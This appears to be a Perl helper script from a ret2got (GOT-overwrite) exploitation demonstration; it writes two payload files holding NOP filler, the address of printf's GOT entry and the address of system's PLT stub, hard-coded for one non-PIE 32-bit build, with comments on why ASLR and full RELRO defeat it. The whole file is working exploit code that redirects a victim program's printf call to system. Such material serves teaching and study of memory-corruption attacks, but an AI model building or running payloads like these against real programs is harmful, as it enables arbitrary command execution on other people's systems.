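#!/usr/bin/perl
# Writes the two input files used by the ret2got (GOT-overwrite) demonstration:
#   payload_ret2got      - 8 filler bytes followed by the address of printf's
#                          GOT entry
#   payload_ret2got_sys  - the address of system's dynamic linker call
# The victim program is not part of this file, so how it consumes the two
# files is not shown here.
#
# Both addresses are hard-coded for one particular build of the target. They
# only hold while the binary is loaded at a fixed base and its GOT is
# writable; a PIE build under ASLR, or full RELRO (-Wl,-z,relro,-z,now),
# invalidates them.
use strict;
use warnings;

# This address must match the address of system's dynamic linker call in the
# target binary (presumably its PLT stub - confirm against the disassembly).
# Bytes are in little-endian order.
my $sysaddr = "\x46\x83\x04\x08";    # 0x08048346

# This address must match the address of printf's GOT entry in the target
# binary. Bytes are in little-endian order.
my $printfaddr = "\x0c\xa0\x04\x08";    # 0x0804a00c

# Eight bytes of 0x90 (the x86 NOP opcode) used as filler in front of the
# address.
my $pad = "\x90" x 8;

# Input string for the victim program: filler, then the GOT entry address.
my $arg = $pad . $printfaddr;

# Store both inputs as files in the current working directory.
_write_raw('payload_ret2got',     $arg);
_write_raw('payload_ret2got_sys', $sysaddr);

# Write $bytes to $path exactly as given, truncating any existing file.
# Dies with the OS error if the file cannot be opened, written or closed.
sub _write_raw {
    my ($path, $bytes) = @_;

    # Three-arg open with a lexical handle: the file name is never parsed for
    # a mode prefix. The :raw layer keeps bytes above 0x7f and any newline
    # byte from being translated by a default I/O layer.
    open my $out, '>:raw', $path or die "open $path: $!";
    print {$out} $bytes or die "write $path: $!";

    # Buffered write errors only surface at close, so check it as well.
    close $out or die "close $path: $!";
    return;
}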